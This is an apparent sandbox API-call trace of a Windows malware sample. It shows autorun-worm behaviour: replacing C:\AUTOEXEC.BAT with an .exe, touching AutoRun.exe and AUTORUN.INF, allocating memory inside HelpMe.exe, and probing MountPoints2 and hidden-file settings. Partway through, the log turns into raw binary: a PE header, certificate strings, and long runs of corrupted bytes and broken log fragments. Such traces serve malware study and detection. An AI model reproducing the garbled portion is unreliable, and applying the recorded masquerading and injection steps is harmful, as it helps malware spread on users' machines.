"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","FAILURE","","hDevice->0x00000124","dwIoControlCode->0x006d0008","lpInBuffer->0x0049bb00","nInBufferSize->0x00000046","lpOutBuffer->0x00498780","nOutBufferSize->0x00000020","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000124","dwIoControlCode->0x006d0008","lpInBuffer->0x0049bb00","nInBufferSize->0x00000046","lpOutBuffer->0x00486100","nOutBufferSize->0x000000ee","lpBytesReturned->0x0120f374","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000124","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000138","hKey->0x00000124","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000138","lpValueName->Data"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000138","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000124","hKey->0x00000138","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000124","lpValueName->Generation"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000124","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","FAILURE","","hDevice->0x00000124","dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBufferSize->0x00000208","lpOutBuffer->0x00499e40","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000124","dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBufferSize->0x00000208","lpOutBuffer->0x0049cc48","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000124","lpFileName->\\.\MountPointManager","dwDesiredAccess->ATTRIBUTES"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","memory","VirtualAllocEx","SUCCESS","0x00164000","th32ProcessID->1400","szExeFile->HelpMe.exe","lpAddress->0x00164000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->61440"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000cc","nNumberOfBytesToRead->44918"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->44918"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","WriteFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToWrite->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\AUTOEXEC.BAT"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\AUTOEXEC.BAT.exe","lpNewFileName->C:\AUTOEXEC.BAT"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000130","lpFileName->C:\AutoRun.exe","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToRead->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000130","lpFileName->C:\AUTORUN.INF","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x00000130","nNumberOfBytesToRead->268"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x00000130","lpFileName->C:\9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x0000012c","lpFileName->C:\AUTORUN.INF","dwDesiredAccess->GENERIC_READ"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","CreateFileW","SUCCESS","0x000000cc","lpFileName->C:\AUTORUN.INF.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","FAILURE","","hDevice->0x00000124","dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBufferSize->0x00000208","lpOutBuffer->0x00499e40","nOutBufferSize->0x00000008","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","device","DeviceIoControl","SUCCESS","","hDevice->0x00000124","dwIoControlCode->0x006d0034","lpInBuffer->0x0049ca38","nInBufferSize->0x00000208","lpOutBuffer->0x0049cc88","nOutBufferSize->0x00000010","lpBytesReturned->0x0120f884","lpOverlapped->0x00000000"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegCreateKeyExW","SUCCESS","0x00000124","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegSetValueExW","SUCCESS","","hKey->0x00000124","lpValueName->BaseClass","dwType->1","lpData->Drive","cbData->12"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000124","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->0x00000124","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x0000013c","lpValueName->Generation"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x7c9c0000","lpFileName->SHELL32.dll"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","system","LoadLibraryA","SUCCESS","0x774e0000","lpFileName->ole32.dll"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x0000013e","hKey->HKEY_CLASSES_ROOT","lpSubKey->Directory"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->0x0000013e","lpSubKey->CurVer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000126","hKey->0x0000013e","lpSubKey->(null)"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x0000013c","lpValueName->DontShowSuperHidden"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x0000013c","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000140","hKey->0x0000013c","lpSubKey->(null)"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000140","lpValueName->ShellState"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","SUCCESS","","hKey->0x00000140","lpValueName->ShellState"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","FAILURE","","hKey->HKEY_LOCAL_MACHINE","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegOpenKeyExW","SUCCESS","0x00000140","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
"20190111212126.399","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","registry","RegQueryValueExW","FAILURE","","hKey->0x00000140","lpValueName->ForceActiveDesktopOn"
"20190111212126.399","1748","9dd68MZ
!This program cannot be run in DOS mode.
@.rsrc
SetupResources.pdb
PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXX
0p1+0)
"Copyright (c) 1997 Microsoft Corp.1
Microsoft Corporation1!0
Microsoft Root Authority0
070822223102Z
120825070000Z0y1
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Code Signing PCA0
Il/$>e
r0p1+0)
"Copyright (c) 1997 Microsoft Corp.1
Microsoft Corporation1!0
Microsoft Root Authority
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Code Signing PCA0
091207224029Z
110307224029Z0
Washington1
Redmond1
Microsoft Corporation1
Microsoft Corporation0
3http://crl.microsoft.com/pki/crl/products/CSPCA.crl0H
,http://www.microsoft.com/pki/certs/CSPCA.crt0
0p1+0)
"Copyright (c) 1997 Microsoft Corp.1
Microsoft Corporation1!0
Microsoft Root Authority0
060916010447Z
190915070000Z0y1
Washington1
Redmond1
Microsoft Corporation1#0!
Microsoft Timestamping PCA0
ipfx'f
N+"\hE
","lpFileName->%s"
"%s","%d","%s","%d","filesystem","DeleteFileW","SUCCESS","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","DeleteFileW","FAILURE","","lpFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_LOGOFF
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
EWX_REBOOT
"%s","%d","%s","%d","filesystem","MoveFileExW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileExW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressA","FAILURE","","lpExistingFileName->%s","lpNewFileName->%s"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","MoveFileWithProgressW","FAILURE","","lpExistingFileName->%ws","lpNewFileName->%ws"
"%s","%d","%s","%d","filesystem","CopyFileA","SUCCESS","","lpExistingFileName->%s","lpNewFileName->%s"
GENERIC_WRITE
INTERNET_FLAG_EXISTING_CONNECT
EWX_RESTARTAPPS
SHTDN_REASON_MAJOR_HARDWARE
"%s","%d","%s","%d","filesystem","CopyFileA","FA
%;6E","","lpExistingFileName->%s","lpNewFileName->%s"
SERVICE_CONTROL_NETBINDENABLE
INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
SHTDN_REASON_MAJOR_OPERATINGSYSTEM
"%s","%d","%s","%d","filesystem","CopyFileW","SUCCESS","","lpExistingFileName->%ws","lpNewFileNa3(.>@
ZTI.d?$TDN_REASON_MAJOR_OTHER
","%d","%
"FAQNURO ,"z
)meNam
imeNamee>-
eea,"%
l#ud",BD)l
d3","lpNewFilfNC_U
<812bzej}lcgmq~ykucfmk;7y~l4'7scGG@
F'v}x1pi
AiZN\l6"
8:00cjxf:7aw
! -:>2
abnglga"szg]
!I5DHFgaq's17AM
~UGvY\U~CAGIIv
	G 46144
	QD@cI
\UCIBDU]
vqy|ebq
]IuIXBFX\VtXBV}POI
JF8;d79bA
AIdX[Sy
>0.,7*q
Z\@`S@\QSGAG
<=4ojsa26	/+
9>*nl|0d68
DHFfQB
JAtu+t13r
A_PRZT^FdEN
KbdT.8:i{r-w0001
VY\UCMQyoO
kUA]PQTtX^Ty
qyarrgk
	QZF"_
	QOIOJ
v9y|ddu
5 (HpPZQ
XiZ	6;	
<n79bA
NX[UDO
R}['MBV
-FHP#2:akb=
]@y^`YD
^y^rEVRG
]^|AE`YDWRF
NMRARR
Pt(,"tL
VYCI%N@MF6Z
7woa!6%KOG
tT@YSUyMoM
A]<PCA6&0
R@9ATJ
R@7EDrEVVUB
WvLL`YD
rIDUBbUDW^L
FUB\UR}oF
<812vk}qcko}cru|","9#!x}j*%:d&$&
#|*pc-tf51{2&574b7t00-'qkv!{#*'>keyb2c24bk!3a}w!}
{bcsu}
v,79ory"
a	$3:4&)
ai"0x0cri}q~qeip+9fw
+0/*08
ebg8"," ?
,3 ckt!6wl}<" f&+&vyb79d517rk4*q#<dbq0=n!)*"}s2d6b7&3nx{u92gq0a;2cu`1q,"lp
!6$,06rmd7`0000cubtea!(
:?7rzwp
yqfsa)"
>##cati=+
=/&bpd*
|0010wulip//
 *5!ct->c=bfysuos{lYXm~o
vcw|}gk351qipg~w}}omw06ytg3'0e&eb3ds6o-vt;tv,7`)/jd`-41bfd6quv;u-*73w}80fcaq/y4)xfq;c`nnvu{g
qregi::&<pbg
lzcnefhKeydp
'2 'are
;7>/+0
#"&3,4lBXgmbt}yctrfnf~myzgeb",k
cqjlivf"(w
g(# f<&-}ys'm-z
d79+-f#1{r`="}#!;*{ks1b*dcaq
lu4-w`=~( pkz+}mwexijghk  $=st;7vip
",""el<
.!96><*
,:)and\
!7$>+6vRLnswnkqfnuses12x`gpclivnqxyesp|(+w|8cfe
-1'ays0f"yp#hj' g4&574bTIGV\
44w3n=4,6}cwv c24b}39hg|1vhmfy68",
tr*jxf
kcl",q 
{sc<9Sub{
+of#?>1$
8<(1<+
De;87*
oc6$:5m_Oe`
dwtxu}w121eyqtpeoiqbvs}","n,;|wm1($z3)#juw'rd5f,hs-6`("yeq!+c&fdd4cz;}'=!.yc|01+m
'a&.vfp;n`"1`~gocw> moryud}
&''0> 
ESS"{jo+xu}y0000ud}'1`
5)*)'6
Z17_]PBG
T]379!Yn
N180fc24*8da744d","lpAddress->0x00000000","dwSize->1048576","flAlloc
q{`f->0*ctcxuZ\
?ou->0;
lt_SE]TLyy
cTEE[_UBnTCRGEKBGKkqKA^KM
Sbfdd442d6bdca818
a"0G:ta744d","37686	 }EHmbE
.2Virt
nQmlocEx",
CESSb,"0|
2 0","th32
:2,"szExeFhle-V
:sfe6ceb376d9d51d7
a">F7'4bd1bfdd442d~
3(0fc24b8d`744
UCtdres;
< x0015000
dwSi:e->
1(4","
onType->0x00001000","flPro
3cd->0x0
2 2004.+
3)0111
0!21.3
"1744","13d&88cf
aub376
1d79nc2f
E7$bd1b
b8da8m4t","1
5cUx","
","tkA2@roce
fdd4,Dd&
->0xVK0 0000
tyonTy
-.0x00
6!","1
1t79bc
fs24b8
eficeI
efice-
ote->0
7'e463
0!00",
"~OutB
BitesR
eblapped->
6!","1
1t79bc
`8da744d",
56`r-"
Ntice","DeviLgI
[ml","SUCCE!c ,"r-"
ogvice->0x0
	fwIoContro
2390008","
Y/>0x77e463
 ,&<HnBufferSize->0x000001`
\rO[D@uxVgr!
."<_@yJJqRK[wrpJf-2
0fc2c"0
np}[gr&Lrp
I/>@U20
:85Hg6
`d1Odd
Iti5I ,`hgvGOgIIomnb^ml(
	."rjgv
_Ao`EpoLrmdS
_KnJGdfs@QiRW/>
 ,x^rO
GvBsUdej`kzU
npmBgrXUrped->
:1","1
:","9dj68
U`376d9}4t
3caJ1{_
da^GPCSjGAM
CH"D@s>
rPonCC7
*!72![{""
T`B_SU@GoIO
UC@90;4jG\N
VS#]ZV18
}EDUHf00g.e	
;	AQS=H00
3}_QF`K
Hw_;_^E@	
2c!eQ(
HPDx"5gY^uHUA
,'eBXMUwX]WtJ1
1jVTTVIdX[Qo"
QGA36La4
1tD]CXG0
Kn['0C4G
sEBBU^GdPCA
4gQQVjM
H]Dx55"QB
0wUViZ
I>%zwUE
^T]Wf12 NCQ	8.
AJY:IDUd_gYTGNbC@0
9sCTPFTtX^To3^5qIVw^X]rCKW
D88cc2W
ET379)&`(&y
jCMZrNo"
uEL7:40
,dKBF?-
2-kc=b
17@U]jUBFQAIclp
2~HGBq-
cUBFYRUg",_n"*
H{H900
LJU+UBFYSTq0"B >
z>0E2bTU"
HJU3UIg0
~qWBGPSTp1
3`TUr\VYEGgGHrLy"L k
5')UZS
%caj3jU
BQcdC.pTPyHGBi
4e~,a+
olm.p62
GUgZ{"
EUuHg03ufzc4>z]m
USFMUuHo"
&T9V@}
xy^DUB_UDm\G
#Bu1/+;c{dVT\]2
cffnhM
OKW+DBY^Wq00
BGS@wKUT11
0uTFr[AJTLXvYEQYFeF9d
f,QUB6S#
G\VXXX~K@V
</7 !S
_TU`_Y
DG^"hs
^Q1|9X
,7	3)4!"
v^Cb\DgP]GT2
6eB@~CGI"
5}VVIPU
]C6d!frT
`gQF(W
GHfTTD]OIL
leF.e6!
2LHNG,"
YJUsBY
YAMN=+
?uSLddfGfIA\0R3vWEaESCZFHxLJMf7
Wd&3#RM/
%44Sep
$VGQB	
6q]ViL
2PUr6'%,7>2LOGs
E^DUB0@:eIV?	5
@]0-&<pM
7'1;*"3
;=1KnkNaURMY^_12C3vWEmcq_DC"Y6s]Vmaidd
*s.&237<gp
6bpa&]Eu_
u,")3dLNyL
	oca}u^K'0
,+ <NIu0U3|rxU@cDPEL
?329p(
;-CYeND]u,"${
fe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190111212121.381","1748","9dd688cfe6ceb376d9d51d79bc2fc574bd1bfdd442d6bdca8180fc24b8da744d","1768","filesystem","ReadFile","SUCCESS","","hFile->0x000000a0","nNumberOfBytesT
2q,#0q <#1748","8dd698cfe6ceb376d9d5
"fCiEWFX_e
"b`CrsSb
J"\~u_Se@}fpJtWGT]br[Be
]9WT1WU9Q
QbWWbRTd
"gTaQtiYV"
S`vCpeS
DnxEmTTryTBOGeE`odPaR
U6ZVcY
gUzvEje"
Pl\L>	
0	S0	T9
"l3"SQ1XR1PR2PV1ST.R^1@
1TW8AN"
"7aC'pS7
R0TS0T
0TX0TS1WR2TV1KV8TD,D
'ilUZN"Se; EScZH""
TAOV:H@eC,^brY
fUNQUb
bTIPSdTL
"c-pqEc+
VfUNWSb
+`{Cu+f
eB7PryD
S6TARP1TO
4R@SW7
DSe;{uScZ
QGeT9[UeC
Z2lCs=22"
HQS0R@CH"X3
$xgZH@Se;'&ScZHF"
.eIUZVx
e]ZJAL_
yqZJDSTCAEWS*,20X7wd
0000","lpFileName,>cdraxi#2
"20190111212121/421&,*1'4
dd688cfe6ceb376d9e53d39jc3fa534jd1bfdd442d6bdca81(0Fcr4
8da744d","1768",#psobers#,#Cse`tgPpoaeqsKnvepnclS"("WUGCASW"("5440&,&ltAtphigapignFaee%> n}ld)*,*lxCgmeafdDife%>S:\WYNTOGS\syste}3
\heLpme.exe
*"281)0
#5'$688coe
cdj3&9d9d$1d
8jc#vc57%bd
coduf42d7bd"`11
fc25b8'`;4%7","076y# "U&ocers"o#_i
Gxec#,"
TA@AVU%,"","
=g}12\H
-201(01
0:1=!21.%01
- 1748","9dd.r:sB/4sgb37
{f'8j`#Nc575bdqcndu
72d'bd
ec2%b8
!,"076
#$"w|lesxst
fadGil
@CERS"
#".!lCoke->0(z2 lz2qXh.2
011021r0:1!
31"="1
:dd'88
a377d9
49d8,bc2gc5
edd542
;181fc
5b:ge223d","
9vuei.2W9gqT.DyneW"
opFile
`oe->C:\DOCUME~10
Vn4\LO;
z^Dd}pH
#,"$v|eg
qedHcc%rc-*
FNESIC
211312q3!.#
2",#17t92,4
gd698c&d&c[
076l9du0t7
`2fk57tfd1bF(f$\~f&cf`e=7?8fc24b8da744d","1768","memory","V`rtualAlfdoHv-<3AFWVSDK;,"0x00154000
~6 8| <*(uCa6g=6z7%;z <**nQd msi8k
.>0y00p1!0$
!,"glP2ndew
.>0y00p1 0$
#20q8 1%
112021n5 16
!1758"l#)dp
;8cge6#dr3#
g9d41dw8rc
`574bdqcvdd
72d6bd#`(1
ec24b8$`'44
!,"176x#<"f
oesyst%l2,
fadFil%#<"S
@CESS"l#2,
Eile->py 00
30a0",bo^uR
frOfBy4dcTo
fad->6q5$0
	"2019p0!12
1121.4p5","
b )ef5<=eam?inn>99t(v&%q!.zc2fc574bd(bfdd44(
8gVi!g2 oQE[
GCwo.2
a xz$nu
a ~~8orU?Mv
mG:$vues4!|y22EG "x|; y|3"Q
3"]c6 Io.2]z6(Na )
)4(T.duZ.gr_z4t
ojVh|e
!nNtmb%sMfBytesToRead->"~6$8m
}3"0"1
:dd788#gg6ceb376d9d51d7i-a"",7'1bd1>)ft\{0t7rdu
;181fcr5Z8r
444m",b0'6.
/"fhle3xcts
!,"Vri4dViF
!,"RUC
!","hF)mu-
{00000p`$"
mNumbe2NvBF
fsToWr)uu->
311121r0"1.
31","1w5:!('9bc>12hjh8leb376d9d% v$-wu%~z/,(
z.BGFG
0fc24b8da744d","1768
*ct2&nu
+6$644r
m3'28",26k|=#{cuum4[!Wrhte
h|e4T!SUBCE
R2,4[/"hGil%,.0nJ30010at#<"x5vmbdrO&Cits
WoWsit%,.6'I70"
"r1!9&O212021r0>4
F!,"174x#<"
g688cf%7se]O46d9d5qe'9]
1fc574"e!bY
g442d6"esa
L;0fc24"<da7
p3'7:!('`ndlyr
ykb2=0AqtrQqle","SUCCESS",""58sZtrz
A~D_QQGyQzytesp>PuQ5/.
vc2!Ya3!]c3"Ic3>
>uc]Sur
fnt^Er3h
kemeMa.`eer"
"20190111"b0!6b,$71",>b5$
q.28td6
c%c#76
:d51d7yca2fc574bd1bfdd4xaf&"7aq=180>00$
kfq6$4q
/"1668b-
jst{y"l#Ber
verxVa,tuEm
!,"GAI
TBE5S!",#hK%x=>'
300100y9:,
sVadue
@omxos)uqnY
":01y1)1
221:1.t3!",
2748",b8td6
;cfe6c%c#76
:d51d7ycs2X
674jd1"g|d
1d6jdc!93;4ff22e0mk<89j-<3#$"-4;:k
|unjmY
v@AhXLD`eyETz
bgpwped
x00000098","
q.2r1ey
 Bi3Se}&{Fy8wu],U24vDQQ
WB]v.2:x xS1{=
vn`r5neA
c}Ay<\E9gRqtto^
311021r0"1;
11"-"1w5("9
